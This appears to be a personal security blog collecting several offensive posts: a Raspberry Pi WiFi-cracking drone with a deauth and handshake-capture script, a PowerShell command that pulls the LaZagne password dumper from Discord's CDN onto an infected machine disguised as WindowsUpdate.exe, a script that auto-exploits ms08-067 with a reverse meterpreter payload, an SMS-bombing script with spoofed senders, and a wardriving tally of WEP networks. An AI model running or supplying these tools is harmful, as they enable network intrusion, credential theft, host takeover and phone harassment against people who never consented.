Wifi Cracking Drone

I set out to create a drone with WiFi cracking abilities. Since drones can fly, they can minimize interference and maximize signal strength by flying directly above access points. Drones are designed to be light yet powerful, so the setup I wanted to use needed to be light enough to minimally affect the drone's flying ability. I chose a light 1200 mAh battery from Adafruit and their PowerBoost 1000 to convert the battery's voltage to a steady 5 V at 1 A, which is what the Raspberry Pi needs.

The Software Setup
Setting up the Pi took longer than expected. I began by following the guide here. I was using a Raspberry Pi 3, which has onboard WiFi, as mentioned in the guide. Unfortunately, because I wanted to use the tool set that comes with Kali, I had Kali installed instead of Raspbian. This created some problems I'll talk about later. To start, I installed and set up hostapd and udhcpd as follows:

sudo apt-get install hostapd udhcpd

Then I edited the config file at /etc/udhcpd.conf. I began by commenting out the lines the config file came with and adding the following at the bottom of the file.

interface wlan0
remaining yes
opt subnet
opt router
opt lease 864000

Then I commented out this line in /etc/default/udhcpd


Then I set up the address and netmask the Pi's interface needed to use in /etc/network/interfaces.

iface wlan0 inet static

Next, I set up hostapd by creating the file /etc/hostapd/hostapd.conf. The last lines are crucial on the Raspberry Pi, and we will return to the driver option later.

ieee80211n=1 # 802.11n support
wmm_enabled=1 # QoS support

One last step: editing the #DAEMON_CONF="" line in the /etc/default/hostapd file to read:

DAEMON_CONF="/etc/hostapd/hostapd.conf"

Finally, we just start up the services and tell them to start on boot!

sudo service hostapd start
sudo service udhcpd start
sudo systemctl enable hostapd
sudo systemctl enable udhcpd

Now back to that driver issue….
Since I was running Kali Linux, after an excruciating amount of time and frustration I found that the firmware for the wireless card was simply not installed. Yes, I used the SPECIFIC Kali image for the Pi, and NO, it didn't come with the firmware. This package holds the Broadcom firmware blobs that the brcmfmac kernel driver loads onto the chip; without them the interface never comes up, so hostapd's driver=nl80211 setting (nl80211 is the kernel's wireless configuration interface, not something shipped in the firmware package) has nothing to talk to. Anyway, I fixed this with a simple apt-get and a reboot.

apt-get install firmware-brcm80211
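The files the steps above produce, collected into one script as an added example (not the post's own files): the 192.168.42.0/24 subnet, the SSID "drone" and the passphrase are assumed values to replace before use; the sed edits cover the DHCPD_ENABLED="no" line Debian ships in /etc/default/udhcpd and the DAEMON_CONF line in /etc/default/hostapd, and the firmware package from the step above is installed alongside the daemons.

```shell
#!/usr/bin/env bash
# Added example (not the original post's files): generate the hostapd/udhcpd/interfaces
# configuration for a Raspberry Pi 3 access point on the onboard radio (wlan0).
# ASSUMED values: subnet 192.168.42.0/24, SSID "drone", the passphrase below.
set -eu

AP_IFACE="${AP_IFACE:-wlan0}"               # onboard Broadcom radio hosts the AP
AP_ADDR="${AP_ADDR:-192.168.42.1}"          # assumed Pi address on the AP subnet
AP_MASK="${AP_MASK:-255.255.255.0}"
DHCP_START="${DHCP_START:-192.168.42.10}"
DHCP_END="${DHCP_END:-192.168.42.50}"
SSID="${SSID:-drone}"
WPA_PSK="${WPA_PSK:-ChangeMeBeforeFlight}"  # assumed; hostapd requires 8-63 characters

gen_udhcpd_conf() {                         # /etc/udhcpd.conf
  cat <<EOF
start $DHCP_START
end $DHCP_END
interface $AP_IFACE
remaining yes
opt dns $AP_ADDR
opt subnet $AP_MASK
opt router $AP_ADDR
opt lease 864000
EOF
}

gen_interfaces() {                          # stanza appended to /etc/network/interfaces
  cat <<EOF
allow-hotplug $AP_IFACE
iface $AP_IFACE inet static
    address $AP_ADDR
    netmask $AP_MASK
EOF
}

gen_hostapd_conf() {                        # /etc/hostapd/hostapd.conf, WPA2-PSK/CCMP only
  cat <<EOF
interface=$AP_IFACE
driver=nl80211
ssid=$SSID
hw_mode=g
channel=6
ieee80211n=1
wmm_enabled=1
auth_algs=1
wpa=2
wpa_passphrase=$WPA_PSK
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
}

check_psk_length() {                        # hostapd rejects passphrases outside 8-63 chars
  local n=${#1}
  [ "$n" -ge 8 ] && [ "$n" -le 63 ]
}

install_configs() {   # run as root; writes the files, then enables and starts the services
  apt-get install -y firmware-brcm80211 hostapd udhcpd
  gen_udhcpd_conf  > /etc/udhcpd.conf
  grep -q "^iface $AP_IFACE inet static" /etc/network/interfaces || gen_interfaces >> /etc/network/interfaces
  gen_hostapd_conf > /etc/hostapd/hostapd.conf
  # Debian ships DHCPD_ENABLED="no" in /etc/default/udhcpd; comment it out, then point hostapd at its config
  sed -i 's/^DHCPD_ENABLED="no"/#&/' /etc/default/udhcpd
  sed -i 's|^#*DAEMON_CONF=.*|DAEMON_CONF="/etc/hostapd/hostapd.conf"|' /etc/default/hostapd
  systemctl enable hostapd udhcpd
  systemctl restart hostapd udhcpd
}

if [ "${1:-}" = "install" ]; then           # usage: sudo ./ap-setup.sh install
  check_psk_length "$WPA_PSK" || { echo "WPA passphrase must be 8-63 characters" >&2; exit 1; }
  install_configs
fi
```

Without the `install` argument the script only defines the generators, so the files can be reviewed with `gen_hostapd_conf` before anything under /etc is touched.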

The Hardware Setup

The hardware included:
RaspberryPi 3
Short micro-USB cable
Adafruit 1200 mAh battery
Adafruit PowerBoost 1000
TP-Link USB wireless card capable of monitor mode
DJI Mavic Pro

The PowerBoost’s connectors needed to be soldered on before I could continue.
Below is a picture before the hardware was put on the drone.


After a large amount of electrical tape, we were ready for flight.

It works!


The whole system worked surprisingly well. I was able to connect to the network the Pi was making with no problems. From there I ssh'd into the Pi. The aircrack-ng suite I used to capture the 4-way WiFi handshake worked decently. From what I could tell, the Pi just didn't have enough power to make its own network AND run a network card in monitor mode. It just wasn't discovering very many networks and struggled to capture the actual handshake after many de-auth attacks. A larger battery at a higher amperage could fix this.
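The capture workflow described above, written out as an added example (not the post's own code): the USB adapter is put in monitor mode while the onboard radio keeps serving the Pi's AP, the airodump-ng CSV is parsed to pick a WPA2 target, and deauth bursts are retried until aircrack-ng reports a handshake in the capture. The interface name wlan1, the "wlan1mon" name airmon-ng assigns, and the output prefix are assumptions; the CSV used in the test is constructed.

```shell
#!/usr/bin/env bash
# Added example (not the original post's code): capture a WPA2 4-way handshake with the
# aircrack-ng suite on the monitor-capable USB adapter while the onboard radio (wlan0)
# keeps serving the Pi's own AP. ASSUMED: USB adapter is wlan1, airmon-ng names the
# monitor interface wlan1mon, captures go under /root/capture.
set -eu

MON_SRC="${MON_SRC:-wlan1}"     # USB adapter; never the radio hostapd is using
OUT="${OUT:-/root/capture}"     # airodump-ng appends -01, -02, ... on each run

# Validate a BSSID/MAC before passing it to aireplay-ng.
is_mac() {
  printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# airodump-ng's CSV has an AP section followed by a station section. Print
# "BSSID,channel,ESSID" for the WPA2 APs so a target can be picked from the file.
list_wpa2_aps() {
  awk -F', *' '
    /^BSSID/       { in_ap = 1; next }
    /^Station MAC/ { in_ap = 0 }
    in_ap && NF >= 14 && $6 ~ /WPA2/ { print $1 "," $4 "," $14 }
  ' "$1"
}

start_monitor() {   # deliberately no "airmon-ng check kill": that would take down the AP
  airmon-ng start "$MON_SRC" >/dev/null
  echo "${MON_SRC}mon"
}

survey() {          # $1 = monitor interface; 30 s channel-hopping survey to $OUT-survey-01.csv
  timeout 30 airodump-ng -w "$OUT-survey" --output-format csv "$1" >/dev/null 2>&1 || true
  list_wpa2_aps "$OUT-survey-01.csv"
}

capture_handshake() {   # $1 = BSSID, $2 = channel, $3 = monitor interface
  local bssid=$1 chan=$2 mon=$3
  is_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; return 1; }
  # Lock to the AP's channel: a hopping card misses parts of the EAPOL exchange.
  airodump-ng --bssid "$bssid" -c "$chan" -w "$OUT" "$mon" >/dev/null 2>&1 &
  local dump_pid=$!
  sleep 10
  # Short broadcast deauth bursts, then check whether the capture holds a handshake;
  # aircrack-ng lists "WPA (1 handshake)" for a network whose handshake is complete.
  for _ in 1 2 3; do
    aireplay-ng --deauth 5 -a "$bssid" "$mon" >/dev/null 2>&1 || true
    sleep 15
    if aircrack-ng "$OUT-01.cap" 2>/dev/null | grep -q '1 handshake'; then
      kill "$dump_pid" 2>/dev/null || true
      echo "handshake captured in $OUT-01.cap"
      return 0
    fi
  done
  kill "$dump_pid" 2>/dev/null || true
  echo "no handshake captured; get closer or wait for a client to reconnect" >&2
  return 1
}

if [ "${1:-}" = "run" ]; then   # usage: ./handshake.sh run <BSSID> <channel>
  mon=$(start_monitor)
  capture_handshake "$2" "$3" "$mon"
fi
```

Locking the channel and checking the capture between bursts is what keeps the Pi from deauthing endlessly without ever seeing the reconnect; `aircrack-ng -w wordlist.txt -b <BSSID> capture-01.cap` is then run on the captured file.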

EDIT 10/30/2017
After some issues with udhcpd I switched to isc-dhcp-server. Much faster and more reliable address assignment.

Using Discord’s CDN for Malware Delivery

According to Google a CDN is:

A content delivery network (CDN) is a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server.

Discord uses https://cdn.discordapp.com/ to serve uploaded content.
For example, when I send an image in a Discord server it is assigned a unique URL.
So I placed this image in an empty Discord server named testing.

But anyone with the URL can view it here, without being a member of the server or logging in.

What This Means

Discord’s CDN can be used to deliver malware to a target. In this case, I’m using Discord’s CDN servers to deliver LaZagne to an infected target. You can read about LaZagne here. In short, it dumps passwords from various apps and locations on Windows.

On the infected target, use PowerShell to download the file.

PS C:\Users\Ryan> Invoke-WebRequest -Uri https://cdn.discordapp.com/attachments/297956570850131968/297967232439418880/laZagne.exe -OutFile WindowsUpdate.exe

This has other implications as well: the same link could be dropped into a phishing email, where a URL on a well-known domain draws less suspicion than an attacker-owned host.
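Seen from the defender's side, as an added example (not code from the post): because attachment URLs on cdn.discordapp.com are public and keep the uploader's filename, a web-proxy log is a cheap place to catch executables fetched from them, and the downloaded file's own header, rather than the URL or the Content-Type, tells you what was actually retrieved. The log layout (time, client IP, method, URL) and every URL, ID and IP in the test are constructed sample data.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): triage for executables pulled from Discord's CDN.
# ASSUMED log format, one request per line: "<time> <client-ip> <method> <url>".
set -eu

# Print "client url" for requests to Discord attachment URLs whose filename carries an
# executable or script extension. Case-insensitive; query strings and fragments are ignored.
flag_cdn_exe_urls() {
  awk '
    tolower($4) ~ /^https?:\/\/cdn\.discordapp\.com\/attachments\// {
      url = $4
      sub(/[?#].*$/, "", url)                 # drop ?query and #fragment
      n = split(url, parts, "/")
      name = tolower(parts[n])                # uploader-chosen filename
      if (name ~ /\.(exe|dll|ps1|bat|cmd|js|vbs|hta|scr|msi|jar)$/) print $2, url
    }
  ' "$@"
}

# The CDN serves whatever bytes were uploaded: a "picture" that starts with "MZ" is a PE.
is_pe_file() {
  [ "$(head -c 2 "$1" 2>/dev/null)" = "MZ" ]
}

if [ "${1:-}" = "scan" ]; then              # usage: ./cdn-triage.sh scan proxy.log
  flag_cdn_exe_urls "$2"
fi
```

A detection on the extension alone misses a payload uploaded as `update.png`, which is why the retrieved bytes should be checked too; pairing the proxy hit with a PowerShell or endpoint log showing `Invoke-WebRequest` against the same URL gives the full picture the post's own command would leave.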

ms08-067 Remote Code Execution Automation

Microsoft Security Bulletin on the vulnerability.

Script to automate discovery and exploitation of the Windows XP ms08-067 remote code execution vulnerability.

chmod +x ms08-67auto.sh

What It Does
Enter an ip and a subnet for nmap to scan
nmap scans the OS’s and ports 139 and 445
grep filters results to only Windows XP or Server 2003
Prints results and confirms you want to attack
Gathers RHOST RPORT LHOST and LPORT values for a metasploit rc file
Opens created rc file in metasploit
Run exploit -j to begin

#!/bin/bash
# Scan a range for hosts with 445/139 open that nmap fingerprints as XP or Server 2003,
# then write and load a Metasploit resource file for ms08_067_netapi.
read -p $'\e[1;32mEnter the ip and subnet ex.\e[0m ' ipsubnet
echo -e "\e[1;31mScanning for ports 445 and 139\e[m"
scan=$(sudo nmap "$ipsubnet" -O -p 445,139)
# Keep only the output blocks where an open SMB port sits near an XP/2003 OS guess
ports=$(echo "$scan" | grep -E -B 3 -A 7 '445/tcp open|139/tcp open' | grep -E -B 8 'Microsoft Windows XP|Microsoft Windows Server 2003')
echo "$ports"
#echo "$scan"
read -p 'Is there a target to attack? Press y:' attack
if [ "$attack" = "y" ]; then
    read -p $'\e[1;31mTarget IP address:\e[m' rhost
    read -p $'\e[1;31mWhich port is the service running on?:\e[m' rport
    read -p $'\e[1;31mWhich ip would you like to connect back to?:\e[m' lhost
    read -p $'\e[1;31mWhich port would you like to connect back on?:\e[m' lport
    sudo service postgresql start
    # Resource file: module, target, payload and handler; run "exploit -j" from the console
    echo -e "use exploit/windows/smb/ms08_067_netapi\nset RHOST $rhost\nset RPORT $rport\nset PAYLOAD windows/meterpreter/reverse_https\nset LHOST $lhost\nset LPORT $lport\nset ExitOnSession false" > windowsxp.rc
    msfconsole -q -r windowsxp.rc
fi

# 445 and 139
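The discovery step above relies on grep -B/-A context windows around nmap's normal output, which break whenever nmap's layout shifts. As an added example (not the original script), here is the same selection done on nmap's grepable output (-oG), where each host sits on one line, plus a writer for the resource file with exploit -j included so the console starts the job itself. The sample -oG lines in the test and the 10.0.0.0/24 range are constructed.

```shell
#!/usr/bin/env bash
# Added example (not the original script): sturdier target selection for ms08-067 using
# nmap's grepable output, where one line per host carries the OS guess and the port states.
# ASSUMED: 10.0.0.0/24 as the target range; all IPs in the test are constructed.
set -eu

# Read nmap -oG output (file or stdin) and print "ip port" for hosts whose OS guess is
# Windows XP or Server 2003 and which have 445 or 139 open (445 preferred).
select_ms08_targets() {
  awk '
    /^Host:/ && /OS: .*(Windows XP|Windows Server 2003)/ {
      ip = $2
      port = ""
      if ($0 ~ /(Ports: |, )445\/open\/tcp/)      port = 445
      else if ($0 ~ /(Ports: |, )139\/open\/tcp/) port = 139
      if (port != "") print ip, port
    }
  ' "$@"
}

# OS detection needs root; -oG - sends grepable output to stdout for the parser.
scan_for_targets() {            # $1 = target spec, e.g. 10.0.0.0/24 (assumed)
  sudo nmap -O -p 139,445 -oG - "$1" | select_ms08_targets
}

# Same resource file the original script builds, with "exploit -j" so msfconsole
# launches the job itself instead of waiting for it to be typed.
write_rc() {                    # $1 rhost $2 rport $3 lhost $4 lport $5 output path
  cat > "$5" <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOST $1
set RPORT $2
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $3
set LPORT $4
set ExitOnSession false
exploit -j
EOF
}

if [ "${1:-}" = "scan" ]; then  # usage: ./ms08-targets.sh scan 10.0.0.0/24
  scan_for_targets "$2"
fi
```

Selecting on a single -oG line removes the dependence on how many lines nmap prints between the port table and the OS guess; an nmap fingerprint is still only a guess, so confirming with the module's `check` command before `exploit -j` is the prudent order.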


Flood an SMS Number

Flood a 10 digit number with as many messages as you please.
NOTE: For some unknown reason AT&T receives each message from a new phone number even when using the same email like a Google account.

Enter your Twilio credentials (account SID and auth token) in the script; the carrier lookup authenticates with them.
Make sure your domain is set up with Postfix or another SMTP server. A Google SMTP server could be used as well.
Specify the domain by editing the script.
apt-get install sendemail.
chmod +x smsprank.sh
Change the upper bound of the for loop (15) to change the number of messages sent.

What It Does

First finds the carrier of the number
Then enter the number's email and the message.
Takes a random number from 1000-9999 and sends a new message to the phone from that address.
ex. 4632@example.com, 6346@example.com, 9868@example.com

#!/bin/bash
clear # Clear the screen.

echo -e "\E[1;33m::::: \e[97mE-MAIL SMS BOMBER \E[1;33m:::::\e[31m"

read -p 'Find provider SMS E-Mail, Enter the 10 digit number: ' uservar1

# Query the carrier via Twilio Lookup; -u takes "account SID:auth token"
curl -X GET "https://lookups.twilio.com/v1/PhoneNumbers/${uservar1}?Type=carrier&Type=caller-name" -u "ACCOUNT_SID:AUTH_TOKEN"

#read -p "http://freecarrierlookup.com/ http://www.emailtextmessages.com/"

echo -e "\n\nAT&T - phonenumber@txt.att.net, T-Mobile - phonenumber@tmomail.net, Verizon - phonenumber@vtext.com, Sprint PCS - phonenumber@messaging.sprintpcs.com, Virgin Mobile - phonenumber@vmobl.com"

#use proxy example: curl --proxy socks5h://

echo -e "\E[1;33m::::: \e[97mLets setup email parameters \E[1;33m:::::\e[31m"

read -p 'Message To? ex. 5555551111@vtext.com : ' uservar2 #Target sms email

read -p 'Enter the message you would like to send : ' uservar4

echo -e "\E[1;33m::::: \e[97mBombs away PEW PEW PEW \E[1;33m:::::\e[31m"

# Each of the 15 messages comes from a random four-digit sender (1000-9999) at your domain
for n in {1..15}; do sendemail -f "$((1000 + RANDOM % 9000))@example.com" -t "$uservar2" -m "$uservar4"; done


WiFi Encryption with WiGLE WiFi

I drove around the main roads in my town using WiGLE WiFi on a Nexus 5.

Then I exported the results to a KML file, totaling over 10,200 WiFi networks.

I wasn’t shocked to see about 150 WEP networks.

A few of these networks were owned by small businesses.
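The tally behind those numbers, as an added example (not the post's own code): a script that counts encryption types in a WiGLE KML export and reports the WEP share. It assumes each Placemark's description carries an "Encryption: <TYPE>" field, as the WiGLE Android export does, so adjust the pattern if your export differs; the KML in the test is constructed.

```shell
#!/usr/bin/env bash
# Added example (not the post's code): tally WiFi encryption types from a WiGLE KML export.
# ASSUMED: each <Placemark> description contains "Encryption: <TYPE>" (WiGLE Android export).
set -eu

# Print "count type" pairs, most common first, for every Encryption: value in the file.
# grep -o works per match, so it does not matter whether the KML is one line or many.
count_encryption() {
  grep -o 'Encryption: [A-Za-z0-9_/+-]*' "$1" \
    | sed 's/^Encryption: //' \
    | sort | uniq -c | sort -rn \
    | awk '{ print $1, $2 }'
}

# Total networks that reported an encryption type at all.
count_networks() {
  count_encryption "$1" | awk '{ s += $1 } END { print s + 0 }'
}

# Networks still on WEP, the weak-but-deployed case the post counts.
count_wep() {
  count_encryption "$1" | awk '$2 == "WEP" { n = $1 } END { print n + 0 }'
}

# WEP share as an integer percentage of all networks with an Encryption: field.
wep_percent() {
  local total wep
  total=$(count_networks "$1")
  wep=$(count_wep "$1")
  echo $(( total > 0 ? wep * 100 / total : 0 ))
}

if [ "${1:-}" = "report" ]; then   # usage: ./wigle-tally.sh report export.kml
  count_encryption "$2"
  echo "WEP: $(count_wep "$2") of $(count_networks "$2") ($(wep_percent "$2")%)"
fi
```

Run against the real export, the "WEP" line of the report is the roughly 150-of-10,200 figure above; the same pipeline with `grep -o '<name>[^<]*</name>'` would list the SSIDs of those networks for follow-up.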